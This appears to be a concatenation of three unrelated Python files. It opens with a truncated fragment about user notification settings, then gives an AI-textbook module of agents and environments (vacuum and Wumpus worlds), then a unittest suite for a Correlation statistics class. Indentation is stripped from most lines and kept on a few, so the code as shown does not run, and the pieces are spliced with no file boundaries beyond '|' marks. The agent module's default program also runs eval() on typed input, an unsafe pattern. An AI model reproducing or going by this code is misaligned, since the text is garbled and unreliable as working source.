user,
'workflow:notifications',
project=self
)
if opt_value is None:
opt_value = UserOption.objects.get_value(
user,
'workflow:notifications',
UserOptionValue.all_conversations
)
return opt_value == UserOptionValue.all_conversations
|
"""Implement Agents and Environments (Chapters 1-2).
The class hierarchies are as follows:
Thing ## A physical object that can exist in an environment
Agent
Wumpus
Dirt
Wall
...
Environment ## An environment holds objects, runs simulations
XYEnvironment
VacuumEnvironment
WumpusEnvironment
An agent program is a callable instance, taking percepts and choosing actions
SimpleReflexAgentProgram
...
EnvGUI ## A window with a graphical representation of the Environment
EnvToolbar ## contains buttons for controlling EnvGUI
EnvCanvas ## Canvas to display the environment of an EnvGUI
"""
# TO DO:
# Implement grabbing correctly.
# When an object is grabbed, does it still have a location?
# What if it is released?
# What if the grabbed or the grabber is deleted?
# What if the grabber moves?
#
# Speed control in GUI does not have any effect -- fix it.
from grid import distance_squared, turn_heading
from statistics import mean
import random
import copy
import collections.abc
# ______________________________________________________________________________
class Thing:
"""This represents any physical object that can appear in an Environment.
You subclass Thing to get the things you want. Each thing can have a
.__name__ slot (used for output only)."""
def __repr__(self):
return '<{}>'.format(getattr(self, '__name__', self.__class__.__name__))
def is_alive(self):
"""Things that are 'alive' should return true."""
return hasattr(self, 'alive') and self.alive
def show_state(self):
"""Display the agent's internal state. Subclasses should override."""
print("I don't know how to show_state.")
def display(self, canvas, x, y, width, height):
"""Display an image of this Thing on the canvas."""
# Do we need this?
pass
class Agent(Thing):
"""An Agent is a subclass of Thing with one required slot,
.program, which should hold a function that takes one argument, the
percept, and returns an action. (What counts as a percept or action
will depend on the specific environment in which the agent exists.)
Note that 'program' is a slot, not a method. If it were a method,
then the program could 'cheat' and look at aspects of the agent.
It's not supposed to do that: the program can only look at the
percepts. An agent program that needs a model of the world (and of
the agent itself) will have to build and maintain its own model.
There is an optional slot, .performance, which is a number giving
the performance measure of the agent in its environment."""
def __init__(self, program=None):
self.alive = True
self.bump = False
self.holding = []
self.performance = 0
if program is None:
def program(percept):
return eval(input('Percept={}; action? '.format(percept)))
        assert isinstance(program, collections.abc.Callable)
self.program = program
def can_grab(self, thing):
"""Returns True if this agent can grab this thing.
Override for appropriate subclasses of Agent and Thing."""
return False
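# A minimal usage sketch (not part of the original file): the program slot is
# just a function from percept to action, so a constant agent is one line.
#
#     always_right = Agent(program=lambda percept: 'Right')
#     always_right.program('anything')  # -> 'Right'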
def TraceAgent(agent):
"""Wrap the agent's program to print its input and output. This will let
you see what the agent is doing in the environment."""
old_program = agent.program
def new_program(percept):
action = old_program(percept)
print('{} perceives {} and does {}'.format(agent, percept, action))
return action
agent.program = new_program
return agent
# ______________________________________________________________________________
def TableDrivenAgentProgram(table):
"""This agent selects an action based on the percept sequence.
It is practical only for tiny domains.
To customize it, provide as table a dictionary of all
{percept_sequence:action} pairs. [Figure 2.7]"""
percepts = []
def program(percept):
percepts.append(percept)
action = table.get(tuple(percepts))
return action
return program
def RandomAgentProgram(actions):
"""An agent that chooses an action at random, ignoring all percepts."""
return lambda percept: random.choice(actions)
# ______________________________________________________________________________
def SimpleReflexAgentProgram(rules, interpret_input):
"""This agent takes action based solely on the percept. [Figure 2.10]"""
def program(percept):
state = interpret_input(percept)
rule = rule_match(state, rules)
action = rule.action
return action
return program
def ModelBasedReflexAgentProgram(rules, update_state, model):
"""This agent takes action based on the percept and state. [Figure 2.12]"""
def program(percept):
program.state = update_state(program.state, program.action, percept, model)
rule = rule_match(program.state, rules)
action = rule.action
return action
program.state = program.action = None
return program
def rule_match(state, rules):
"""Find the first rule that matches state."""
for rule in rules:
if rule.matches(state):
return rule
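# Sketch of the rule objects rule_match expects (hypothetical Rule type; this
# module defines no Rule class). Anything with a .matches(state) callable and
# an .action attribute works, e.g. via the already-imported collections:
#
#     Rule = collections.namedtuple('Rule', ['matches', 'action'])
#     rules = [Rule(matches=lambda s: s == 'Dirty', action='Suck'),
#              Rule(matches=lambda s: True, action='Right')]
#     rule_match('Dirty', rules).action  # -> 'Suck'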
# ______________________________________________________________________________
loc_A, loc_B = (0, 0), (1, 0) # The two locations for the Vacuum world
def RandomVacuumAgent():
"""Randomly choose one of the actions from the vacuum environment."""
return Agent(RandomAgentProgram(['Right', 'Left', 'Suck', 'NoOp']))
def TableDrivenVacuumAgent():
"""[Figure 2.3]"""
table = {((loc_A, 'Clean'),): 'Right',
((loc_A, 'Dirty'),): 'Suck',
((loc_B, 'Clean'),): 'Left',
((loc_B, 'Dirty'),): 'Suck',
((loc_A, 'Clean'), (loc_A, 'Clean')): 'Right',
((loc_A, 'Clean'), (loc_A, 'Dirty')): 'Suck',
# ...
((loc_A, 'Clean'), (loc_A, 'Clean'), (loc_A, 'Clean')): 'Right',
((loc_A, 'Clean'), (loc_A, 'Clean'), (loc_A, 'Dirty')): 'Suck',
# ...
}
return Agent(TableDrivenAgentProgram(table))
def ReflexVacuumAgent():
"""A reflex agent for the two-state vacuum environment. [Figure 2.8]"""
def program(percept):
location, status = percept
if status == 'Dirty':
return 'Suck'
elif location == loc_A:
return 'Right'
elif location == loc_B:
return 'Left'
return Agent(program)
def ModelBasedVacuumAgent():
"""An agent that keeps track of what locations are clean or dirty."""
model = {loc_A: None, loc_B: None}
def program(percept):
"""Same as ReflexVacuumAgent, except if everything is clean, do NoOp."""
location, status = percept
model[location] = status # Update the model here
if model[loc_A] == model[loc_B] == 'Clean':
return 'NoOp'
elif status == 'Dirty':
return 'Suck'
elif location == loc_A:
return 'Right'
elif location == loc_B:
return 'Left'
return Agent(program)
# ______________________________________________________________________________
class Environment:
"""Abstract class representing an Environment. 'Real' Environment classes
inherit from this. Your Environment will typically need to implement:
percept: Define the percept that an agent sees.
execute_action: Define the effects of executing an action.
Also update the agent.performance slot.
The environment keeps a list of .things and .agents (which is a subset
of .things). Each agent has a .performance slot, initialized to 0.
Each thing has a .location slot, even though some environments may not
need this."""
def __init__(self):
self.things = []
self.agents = []
def thing_classes(self):
return [] # List of classes that can go into environment
def percept(self, agent):
"""Return the percept that the agent sees at this point. (Implement this.)"""
raise NotImplementedError
def execute_action(self, agent, action):
"""Change the world to reflect this action. (Implement this.)"""
raise NotImplementedError
def default_location(self, thing):
"""Default location to place a new thing with unspecified location."""
return None
def exogenous_change(self):
"""If there is spontaneous change in the world, override this."""
pass
def is_done(self):
"""By default, we're done when we can't find a live agent."""
return not any(agent.is_alive() for agent in self.agents)
def step(self):
"""Run the environment for one time step. If the
actions and exogenous changes are independent, this method will
do. If there are interactions between them, you'll need to
override this method."""
if not self.is_done():
actions = []
for agent in self.agents:
if agent.alive:
actions.append(agent.program(self.percept(agent)))
else:
actions.append("")
for (agent, action) in zip(self.agents, actions):
self.execute_action(agent, action)
self.exogenous_change()
def run(self, steps=1000):
"""Run the Environment for given number of time steps."""
for step in range(steps):
if self.is_done():
return
self.step()
def list_things_at(self, location, tclass=Thing):
"""Return all things exactly at a given location."""
return [thing for thing in self.things
if thing.location == location and isinstance(thing, tclass)]
def some_things_at(self, location, tclass=Thing):
"""Return true if at least one of the things at location
is an instance of class tclass (or a subclass)."""
return self.list_things_at(location, tclass) != []
def add_thing(self, thing, location=None):
"""Add a thing to the environment, setting its location. For
convenience, if thing is an agent program we make a new agent
for it. (Shouldn't need to override this."""
if not isinstance(thing, Thing):
thing = Agent(thing)
assert thing not in self.things, "Don't add the same thing twice"
thing.location = location if location is not None else self.default_location(thing)
self.things.append(thing)
if isinstance(thing, Agent):
thing.performance = 0
self.agents.append(thing)
def delete_thing(self, thing):
"""Remove a thing from the environment."""
try:
self.things.remove(thing)
except ValueError as e:
print(e)
print(" in Environment delete_thing")
print(" Thing to be removed: {} at {}".format(thing, thing.location))
print(" from list: {}".format([(thing, thing.location) for thing in self.things]))
if thing in self.agents:
self.agents.remove(thing)
class Direction:
"""A direction class for agents that want to move in a 2D plane
Usage:
d = Direction("down")
To change directions:
d = d + "right" or d = d + Direction.R #Both do the same thing
Note that the argument to __add__ must be a string and not a Direction object.
Also, it (the argument) can only be right or left."""
R = "right"
L = "left"
U = "up"
D = "down"
def __init__(self, direction):
self.direction = direction
    def __add__(self, heading):
        if self.direction == self.R:
            return {
                self.R: Direction(self.D),
                self.L: Direction(self.U),
            }.get(heading, None)
        elif self.direction == self.L:
            return {
                self.R: Direction(self.U),
                self.L: Direction(self.D),
            }.get(heading, None)
        elif self.direction == self.U:
            return {
                self.R: Direction(self.R),
                self.L: Direction(self.L),
            }.get(heading, None)
        elif self.direction == self.D:
            return {
                self.R: Direction(self.L),
                self.L: Direction(self.R),
            }.get(heading, None)
def move_forward(self, from_location):
x, y = from_location
if self.direction == self.R:
return (x+1, y)
elif self.direction == self.L:
return (x-1, y)
elif self.direction == self.U:
return (x, y-1)
elif self.direction == self.D:
return (x, y+1)
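# Usage sketch (not in the original file): headings rotate by adding a
# right/left string, and move_forward treats +y as down on the grid.
#
#     d = Direction(Direction.U) + Direction.R     # turn right; now facing east
#     d.move_forward((0, 0))                       # -> (1, 0)
#     Direction(Direction.U).move_forward((0, 0))  # -> (0, -1): up decreases y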
class XYEnvironment(Environment):
"""This class is for environments on a 2D plane, with locations
labelled by (x, y) points, either discrete or continuous.
Agents perceive things within a radius. Each agent in the
environment has a .location slot which should be a location such
as (0, 1), and a .holding slot, which should be a list of things
that are held."""
def __init__(self, width=10, height=10):
super().__init__()
self.width = width
self.height = height
self.observers = []
# Sets iteration start and end (no walls).
self.x_start, self.y_start = (0, 0)
self.x_end, self.y_end = (self.width, self.height)
perceptible_distance = 1
def things_near(self, location, radius=None):
"""Return all things within radius of location."""
if radius is None:
radius = self.perceptible_distance
radius2 = radius * radius
return [(thing, radius2 - distance_squared(location, thing.location))
for thing in self.things if distance_squared(
location, thing.location) <= radius2]
def percept(self, agent):
"""By default, agent perceives things within a default radius."""
return self.things_near(agent.location)
def execute_action(self, agent, action):
agent.bump = False
if action == 'TurnRight':
agent.direction = agent.direction + Direction.R
elif action == 'TurnLeft':
agent.direction = agent.direction + Direction.L
elif action == 'Forward':
agent.bump = self.move_to(agent, agent.direction.move_forward(agent.location))
# elif action == 'Grab':
# things = [thing for thing in self.list_things_at(agent.location)
# if agent.can_grab(thing)]
# if things:
# agent.holding.append(things[0])
elif action == 'Release':
if agent.holding:
agent.holding.pop()
def default_location(self, thing):
        return (random.randrange(self.width), random.randrange(self.height))
def move_to(self, thing, destination):
"""Move a thing to a new location. Returns True on success or False if there is an Obstacle.
If thing is holding anything, they move with him."""
thing.bump = self.some_things_at(destination, Obstacle)
if not thing.bump:
thing.location = destination
for o in self.observers:
o.thing_moved(thing)
for t in thing.holding:
self.delete_thing(t)
self.add_thing(t, destination)
t.location = destination
return thing.bump
def add_thing(self, thing, location=(1, 1), exclude_duplicate_class_items=False):
"""Adds things to the world. If (exclude_duplicate_class_items) then the item won't be
added if the location has at least one item of the same class."""
if (self.is_inbounds(location)):
if (exclude_duplicate_class_items and
any(isinstance(t, thing.__class__) for t in self.list_things_at(location))):
return
super().add_thing(thing, location)
def is_inbounds(self, location):
"""Checks to make sure that the location is inbounds (within walls if we have walls)"""
x, y = location
return not (x < self.x_start or x >= self.x_end or y < self.y_start or y >= self.y_end)
def random_location_inbounds(self, exclude=None):
"""Returns a random location that is inbounds (within walls if we have walls)"""
        location = (random.randint(self.x_start, self.x_end - 1),
                    random.randint(self.y_start, self.y_end - 1))
        if exclude is not None:
            while location == exclude:
                location = (random.randint(self.x_start, self.x_end - 1),
                            random.randint(self.y_start, self.y_end - 1))
        return location
def delete_thing(self, thing):
"""Deletes thing, and everything it is holding (if thing is an agent)"""
if isinstance(thing, Agent):
for obj in thing.holding:
super().delete_thing(obj)
for obs in self.observers:
obs.thing_deleted(obj)
super().delete_thing(thing)
for obs in self.observers:
obs.thing_deleted(thing)
def add_walls(self):
"""Put walls around the entire perimeter of the grid."""
for x in range(self.width):
self.add_thing(Wall(), (x, 0))
self.add_thing(Wall(), (x, self.height - 1))
for y in range(self.height):
self.add_thing(Wall(), (0, y))
self.add_thing(Wall(), (self.width - 1, y))
# Updates iteration start and end (with walls).
self.x_start, self.y_start = (1, 1)
self.x_end, self.y_end = (self.width - 1, self.height - 1)
def add_observer(self, observer):
"""Adds an observer to the list of observers.
An observer is typically an EnvGUI.
Each observer is notified of changes in move_to and add_thing,
by calling the observer's methods thing_moved(thing)
and thing_added(thing, loc)."""
self.observers.append(observer)
def turn_heading(self, heading, inc):
"""Return the heading to the left (inc=+1) or right (inc=-1) of heading."""
return turn_heading(heading, inc)
class Obstacle(Thing):
"""Something that can cause a bump, preventing an agent from
moving into the same square it's in."""
pass
class Wall(Obstacle):
pass
# ______________________________________________________________________________
try:
from ipythonblocks import BlockGrid
from IPython.display import HTML, display
from time import sleep
except ImportError:
pass
class GraphicEnvironment(XYEnvironment):
    def __init__(self, width=10, height=10, boundary=True, color=None, display=False):
"""define all the usual XYEnvironment characteristics,
but initialise a BlockGrid for GUI too"""
super().__init__(width, height)
self.grid = BlockGrid(width, height, fill=(200, 200, 200))
if display:
self.grid.show()
self.visible = True
else:
self.visible = False
self.bounded = boundary
        self.colors = color or {}
def get_world(self):
"""Returns all the items in the world in a format
understandable by the ipythonblocks BlockGrid"""
result = []
x_start, y_start = (0, 0)
x_end, y_end = self.width, self.height
for x in range(x_start, x_end):
row = []
for y in range(y_start, y_end):
row.append(self.list_things_at([x, y]))
result.append(row)
return result
"""def run(self, steps=1000, delay=1):
"" "Run the Environment for given number of time steps,
but update the GUI too." ""
for step in range(steps):
sleep(delay)
if self.visible:
self.reveal()
if self.is_done():
if self.visible:
self.reveal()
return
self.step()
if self.visible:
self.reveal()
"""
def run(self, steps=1000, delay=1):
"""Run the Environment for given number of time steps,
but update the GUI too."""
for step in range(steps):
self.update(delay)
if self.is_done():
break
self.step()
self.update(delay)
def update(self, delay=1):
sleep(delay)
if self.visible:
self.conceal()
self.reveal()
else:
self.reveal()
def reveal(self):
"""display the BlockGrid for this world - the last thing to be added
at a location defines the location color"""
self.draw_world()
self.grid.show()
self.visible = True
def draw_world(self):
self.grid[:] = (200, 200, 200)
world = self.get_world()
for x in range(0, len(world)):
for y in range(0, len(world[x])):
if len(world[x][y]):
self.grid[y, x] = self.colors[world[x][y][-1].__class__.__name__]
def conceal(self):
"""hide the BlockGrid for this world"""
self.visible = False
display(HTML(''))
# ______________________________________________________________________________
# Continuous environment
class ContinuousWorld(Environment):
"""Model for Continuous World."""
def __init__(self, width=10, height=10):
super().__init__()
self.width = width
self.height = height
def add_obstacle(self, coordinates):
self.things.append(PolygonObstacle(coordinates))
class PolygonObstacle(Obstacle):
def __init__(self, coordinates):
""" Coordinates is a list of tuples."""
super().__init__()
self.coordinates = coordinates
# ______________________________________________________________________________
# Vacuum environment
class Dirt(Thing):
pass
class VacuumEnvironment(XYEnvironment):
"""The environment of [Ex. 2.12]. Agent perceives dirty or clean,
and bump (into obstacle) or not; 2D discrete world of unknown size;
performance measure is 100 for each dirt cleaned, and -1 for
each turn taken."""
def __init__(self, width=10, height=10):
super().__init__(width, height)
self.add_walls()
def thing_classes(self):
return [Wall, Dirt, ReflexVacuumAgent, RandomVacuumAgent,
TableDrivenVacuumAgent, ModelBasedVacuumAgent]
def percept(self, agent):
"""The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').
Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
        bump = ('Bump' if agent.bump else 'None')
return (status, bump)
def execute_action(self, agent, action):
if action == 'Suck':
dirt_list = self.list_things_at(agent.location, Dirt)
if dirt_list != []:
dirt = dirt_list[0]
agent.performance += 100
self.delete_thing(dirt)
else:
super().execute_action(agent, action)
if action != 'NoOp':
agent.performance -= 1
class TrivialVacuumEnvironment(Environment):
"""This environment has two locations, A and B. Each can be Dirty
or Clean. The agent perceives its location and the location's
status. This serves as an example of how to implement a simple
Environment."""
def __init__(self):
super().__init__()
self.status = {loc_A: random.choice(['Clean', 'Dirty']),
loc_B: random.choice(['Clean', 'Dirty'])}
def thing_classes(self):
return [Wall, Dirt, ReflexVacuumAgent, RandomVacuumAgent,
TableDrivenVacuumAgent, ModelBasedVacuumAgent]
def percept(self, agent):
"""Returns the agent's location, and the location status (Dirty/Clean)."""
return (agent.location, self.status[agent.location])
def execute_action(self, agent, action):
"""Change agent's location and/or location's status; track performance.
Score 10 for each dirt cleaned; -1 for each move."""
if action == 'Right':
agent.location = loc_B
agent.performance -= 1
elif action == 'Left':
agent.location = loc_A
agent.performance -= 1
elif action == 'Suck':
if self.status[agent.location] == 'Dirty':
agent.performance += 10
self.status[agent.location] = 'Clean'
def default_location(self, thing):
"""Agents start in either location at random."""
return random.choice([loc_A, loc_B])
# ______________________________________________________________________________
# The Wumpus World
class Gold(Thing):
    def __eq__(self, rhs):
        """All Gold are equal"""
        return rhs.__class__ == Gold
class Bump(Thing):
pass
class Glitter(Thing):
pass
class Pit(Thing):
pass
class Breeze(Thing):
pass
class Arrow(Thing):
pass
class Scream(Thing):
pass
class Wumpus(Agent):
    screamed = False
class Stench(Thing):
pass
class Explorer(Agent):
holding = []
has_arrow = True
killed_by = ""
direction = Direction("right")
def can_grab(self, thing):
"""Explorer can only grab gold"""
return thing.__class__ == Gold
class WumpusEnvironment(XYEnvironment):
pit_probability = 0.2 # Probability to spawn a pit in a location. (From Chapter 7.2)
    # The room layout is a 4x4 grid; the default 6x6 adds the surrounding walls.
def __init__(self, agent_program, width=6, height=6):
super().__init__(width, height)
self.init_world(agent_program)
def init_world(self, program):
"""Spawn items to the world based on probabilities from the book"""
"WALLS"
self.add_walls()
"PITS"
for x in range(self.x_start, self.x_end):
for y in range(self.y_start, self.y_end):
if random.random() < self.pit_probability:
self.add_thing(Pit(), (x, y), True)
self.add_thing(Breeze(), (x - 1, y), True)
self.add_thing(Breeze(), (x, y - 1), True)
self.add_thing(Breeze(), (x + 1, y), True)
self.add_thing(Breeze(), (x, y + 1), True)
"WUMPUS"
w_x, w_y = self.random_location_inbounds(exclude=(1, 1))
self.add_thing(Wumpus(lambda x: ""), (w_x, w_y), True)
self.add_thing(Stench(), (w_x - 1, w_y), True)
self.add_thing(Stench(), (w_x + 1, w_y), True)
self.add_thing(Stench(), (w_x, w_y - 1), True)
self.add_thing(Stench(), (w_x, w_y + 1), True)
"GOLD"
self.add_thing(Gold(), self.random_location_inbounds(exclude=(1, 1)), True)
"AGENT"
self.add_thing(Explorer(program), (1, 1), True)
def get_world(self, show_walls=True):
"""Returns the items in the world"""
result = []
x_start, y_start = (0, 0) if show_walls else (1, 1)
if show_walls:
x_end, y_end = self.width, self.height
else:
x_end, y_end = self.width - 1, self.height - 1
for x in range(x_start, x_end):
row = []
for y in range(y_start, y_end):
row.append(self.list_things_at((x, y)))
result.append(row)
return result
def percepts_from(self, agent, location, tclass=Thing):
"""Returns percepts from a given location,
and replaces some items with percepts from chapter 7."""
thing_percepts = {
Gold: Glitter(),
Wall: Bump(),
Wumpus: Stench(),
Pit: Breeze()}
"""Agents don't need to get their percepts"""
thing_percepts[agent.__class__] = None
"""Gold only glitters in its cell"""
if location != agent.location:
thing_percepts[Gold] = None
result = [thing_percepts.get(thing.__class__, thing) for thing in self.things
if thing.location == location and isinstance(thing, tclass)]
return result if len(result) else [None]
def percept(self, agent):
"""Returns things in adjacent (not diagonal) cells of the agent.
Result format: [Left, Right, Up, Down, Center / Current location]"""
x, y = agent.location
result = []
result.append(self.percepts_from(agent, (x - 1, y)))
result.append(self.percepts_from(agent, (x + 1, y)))
result.append(self.percepts_from(agent, (x, y - 1)))
result.append(self.percepts_from(agent, (x, y + 1)))
result.append(self.percepts_from(agent, (x, y)))
"""The wumpus gives out a a loud scream once it's killed."""
wumpus = [thing for thing in self.things if isinstance(thing, Wumpus)]
if len(wumpus) and not wumpus[0].alive and not wumpus[0].screamed:
result[-1].append(Scream())
wumpus[0].screamed = True
return result
def execute_action(self, agent, action):
"""Modify the state of the environment based on the agent's actions.
Performance score taken directly out of the book."""
if isinstance(agent, Explorer) and self.in_danger(agent):
return
agent.bump = False
if action == 'TurnRight':
agent.direction = agent.direction + Direction.R
agent.performance -= 1
elif action == 'TurnLeft':
agent.direction = agent.direction + Direction.L
agent.performance -= 1
elif action == 'Forward':
agent.bump = self.move_to(agent, agent.direction.move_forward(agent.location))
agent.performance -= 1
        elif action == 'Grab':
            things = [thing for thing in self.list_things_at(agent.location)
                      if agent.can_grab(thing)]
            if things:
                print("Grabbing", things[0].__class__.__name__)
                agent.holding.append(things[0])
            agent.performance -= 1
elif action == 'Climb':
if agent.location == (1, 1): # Agent can only climb out of (1,1)
agent.performance += 1000 if Gold() in agent.holding else 0
self.delete_thing(agent)
elif action == 'Shoot':
"""The arrow travels straight down the path the agent is facing"""
if agent.has_arrow:
arrow_travel = agent.direction.move_forward(agent.location)
                while self.is_inbounds(arrow_travel):
                    wumpus = [thing for thing in self.list_things_at(arrow_travel)
                              if isinstance(thing, Wumpus)]
                    if wumpus:
                        wumpus[0].alive = False
                        break
                    arrow_travel = agent.direction.move_forward(arrow_travel)
agent.has_arrow = False
def in_danger(self, agent):
"""Checks if Explorer is in danger (Pit or Wumpus), if he is, kill him"""
for thing in self.list_things_at(agent.location):
if isinstance(thing, Pit) or (isinstance(thing, Wumpus) and thing.alive):
agent.alive = False
agent.performance -= 1000
agent.killed_by = thing.__class__.__name__
return True
return False
def is_done(self):
"""The game is over when the Explorer is killed
or if he climbs out of the cave only at (1,1)."""
explorer = [agent for agent in self.agents if isinstance(agent, Explorer)]
if len(explorer):
if explorer[0].alive:
return False
else:
print("Death by {} [-1000].".format(explorer[0].killed_by))
else:
print("Explorer climbed out {}."
.format(
"with Gold [+1000]!" if Gold() not in self.things else "without Gold [+0]"))
return True
# Almost done. Arrow needs to be implemented
# ______________________________________________________________________________
def compare_agents(EnvFactory, AgentFactories, n=10, steps=1000):
"""See how well each of several agents do in n instances of an environment.
Pass in a factory (constructor) for environments, and several for agents.
Create n instances of the environment, and run each agent in copies of
each one for steps. Return a list of (agent, average-score) tuples."""
envs = [EnvFactory() for i in range(n)]
return [(A, test_agent(A, steps, copy.deepcopy(envs)))
for A in AgentFactories]
def test_agent(AgentFactory, steps, envs):
"""Return the mean score of running an agent in each of the envs, for steps"""
def score(env):
agent = AgentFactory()
env.add_thing(agent)
env.run(steps)
return agent.performance
return mean(map(score, envs))
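# Usage sketch (not in the original file; scores vary with the module RNG):
#
#     factories = [ModelBasedVacuumAgent, ReflexVacuumAgent]
#     compare_agents(TrivialVacuumEnvironment, factories, n=20, steps=100)
#     # -> [(factory, mean_score), ...], one pair per factory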
# _________________________________________________________________________
__doc__ += """
>>> a = ReflexVacuumAgent()
>>> a.program((loc_A, 'Clean'))
'Right'
>>> a.program((loc_B, 'Clean'))
'Left'
>>> a.program((loc_A, 'Dirty'))
'Suck'
>>> a.program((loc_A, 'Dirty'))
'Suck'
>>> e = TrivialVacuumEnvironment()
>>> e.add_thing(ModelBasedVacuumAgent())
>>> e.run(5)
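
A further check (added example) exercising TableDrivenVacuumAgent's
percept history, consistent with the table defined above:

>>> a = TableDrivenVacuumAgent()
>>> a.program((loc_A, 'Clean'))
'Right'
>>> a.program((loc_A, 'Dirty'))
'Suck'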
"""
|
import unittest
import numpy as np
import scipy.stats as st
from ..analysis import Correlation
from ..analysis.exc import MinimumSizeError, NoDataError
from ..data import UnequalVectorLengthError, Vector
class MyTestCase(unittest.TestCase):
def test_Correlation_corr_pearson(self):
"""Test the Correlation class for correlated normally distributed data"""
np.random.seed(987654321)
x_input_array = list(st.norm.rvs(size=100))
y_input_array = np.array([x + st.norm.rvs(0, 0.5, size=1) for x in x_input_array])
alpha = 0.05
output = """
Pearson Correlation Coefficient
-------------------------------
alpha = 0.0500
r value = 0.8904
p value = 0.0000
HA: There is a significant relationship between predictor and response
"""
exp = Correlation(x_input_array, y_input_array, alpha=alpha, display=False)
self.assertLess(exp.p_value, alpha, "FAIL: Correlation pearson Type II error")
self.assertEqual(exp.test_type, 'pearson')
self.assertAlmostEqual(exp.r_value, 0.8904, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.0, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.8904, delta=0.0001)
self.assertEqual(str(exp), output)
def test_Correlation_no_corr_pearson(self):
"""Test the Correlation class for uncorrelated normally distributed data"""
np.random.seed(987654321)
x_input_array = st.norm.rvs(size=100)
y_input_array = st.norm.rvs(size=100)
alpha = 0.05
output = """
Pearson Correlation Coefficient
-------------------------------
alpha = 0.0500
r value = -0.0055
p value = 0.9567
H0: There is no significant relationship between predictor and response
"""
exp = Correlation(x_input_array, y_input_array, alpha=alpha, display=False)
self.assertGreater(exp.p_value, alpha, "FAIL: Correlation pearson Type I error")
self.assertEqual(exp.test_type, 'pearson')
self.assertAlmostEqual(exp.r_value, -0.0055, delta=0.0001)
self.assertAlmostEqual(exp.statistic, -0.0055, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.9567, delta=0.0001)
self.assertEqual(str(exp), output)
def test_Correlation_corr_spearman(self):
"""Test the Correlation class for correlated randomly distributed data"""
np.random.seed(987654321)
x_input_array = list(st.weibull_min.rvs(1.7, size=100))
y_input_array = np.array([x + st.norm.rvs(0, 0.5, size=1) for x in x_input_array])
alpha = 0.05
output = """
Spearman Correlation Coefficient
--------------------------------
alpha = 0.0500
r value = 0.7271
p value = 0.0000
HA: There is a significant relationship between predictor and response
"""
exp = Correlation(x_input_array, y_input_array, alpha=alpha, display=False)
self.assertLess(exp.p_value, alpha, "FAIL: Correlation spearman Type II error")
self.assertEqual(exp.test_type, 'spearman')
self.assertAlmostEqual(exp.r_value, 0.7271, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.0, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.7271, delta=0.0001)
self.assertEqual(str(exp), output)
def test_Correlation_no_corr_spearman(self):
"""Test the Correlation class for uncorrelated randomly distributed data"""
np.random.seed(987654321)
x_input_array = st.norm.rvs(size=100)
y_input_array = st.weibull_min.rvs(1.7, size=100)
alpha = 0.05
output = """
Spearman Correlation Coefficient
--------------------------------
alpha = 0.0500
r value = -0.0528
p value = 0.6021
H0: There is no significant relationship between predictor and response
"""
exp = Correlation(x_input_array, y_input_array, alpha=alpha, display=False)
self.assertGreater(exp.p_value, alpha, "FAIL: Correlation spearman Type I error")
self.assertEqual(exp.test_type, 'spearman')
self.assertAlmostEqual(exp.r_value, -0.0528, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.6021, delta=0.0001)
self.assertAlmostEqual(exp.statistic, -0.0528, delta=0.0001)
self.assertTrue(np.array_equal(x_input_array, exp.xdata))
self.assertTrue(np.array_equal(x_input_array, exp.predictor))
self.assertTrue(np.array_equal(y_input_array, exp.ydata))
self.assertTrue(np.array_equal(y_input_array, exp.response))
self.assertEqual(str(exp), output)
def test_Correlation_no_corr_pearson_just_above_min_size(self):
"""Test the Correlation class for uncorrelated normally distributed data just above the minimum size"""
np.random.seed(987654321)
alpha = 0.05
self.assertTrue(Correlation(st.norm.rvs(size=4),
st.norm.rvs(size=4),
alpha=alpha,
display=False).p_value,
"FAIL: Correlation pearson just above minimum size")
def test_Correlation_no_corr_pearson_at_min_size(self):
"""Test the Correlation class for uncorrelated normally distributed data at the minimum size"""
np.random.seed(987654321)
alpha = 0.05
self.assertRaises(MinimumSizeError, lambda: Correlation(st.norm.rvs(size=3),
st.norm.rvs(size=3),
alpha=alpha,
display=False).p_value)
def test_Correlation_no_corr_pearson_unequal_vectors(self):
"""Test the Correlation class for uncorrelated normally distributed data with unequal vectors"""
np.random.seed(987654321)
alpha = 0.05
x_input_array = st.norm.rvs(size=87)
y_input_array = st.norm.rvs(size=100)
self.assertRaises(UnequalVectorLengthError, lambda: Correlation(x_input_array, y_input_array,
alpha=alpha,
display=False).p_value)
def test_Correlation_no_corr_pearson_empty_vector(self):
"""Test the Correlation class for uncorrelated normally distributed data with an empty vector"""
np.random.seed(987654321)
alpha = 0.05
self.assertRaises(NoDataError, lambda: Correlation(["one", "two", "three", "four", "five"],
st.norm.rvs(size=5),
alpha=alpha,
display=False).p_value)
def test_Correlation_vector(self):
"""Test the Correlation class with an input Vector"""
np.random.seed(987654321)
x_input_array = list(st.norm.rvs(size=100))
y_input_array = np.array([x + st.norm.rvs(0, 0.5, size=1) for x in x_input_array])
alpha = 0.05
output = """
Pearson Correlation Coefficient
-------------------------------
alpha = 0.0500
r value = 0.8904
p value = 0.0000
HA: There is a significant relationship between predictor and response
"""
exp = Correlation(Vector(x_input_array, other=y_input_array), alpha=alpha, display=False)
self.assertLess(exp.p_value, alpha, "FAIL: Correlation pearson Type II error")
self.assertEqual(exp.test_type, 'pearson')
self.assertAlmostEqual(exp.r_value, 0.8904, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.0, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.8904, delta=0.0001)
self.assertEqual(str(exp), output)
def test_Correlation_vector_alpha(self):
"""Test the Correlation class with an input Vector and different alpha"""
np.random.seed(987654321)
x_input_array = list(st.norm.rvs(size=100))
y_input_array = np.array([x + st.norm.rvs(0, 0.5, size=1) for x in x_input_array])
alpha = 0.01
output = """
Pearson Correlation Coefficient
-------------------------------
alpha = 0.0100
r value = 0.8904
p value = 0.0000
HA: There is a significant relationship between predictor and response
"""
exp = Correlation(Vector(x_input_array, other=y_input_array), alpha=alpha, display=False)
self.assertLess(exp.p_value, alpha, "FAIL: Correlation pearson Type II error")
self.assertEqual(exp.test_type, 'pearson')
self.assertAlmostEqual(exp.r_value, 0.8904, delta=0.0001)
self.assertAlmostEqual(exp.p_value, 0.0, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.8904, delta=0.0001)
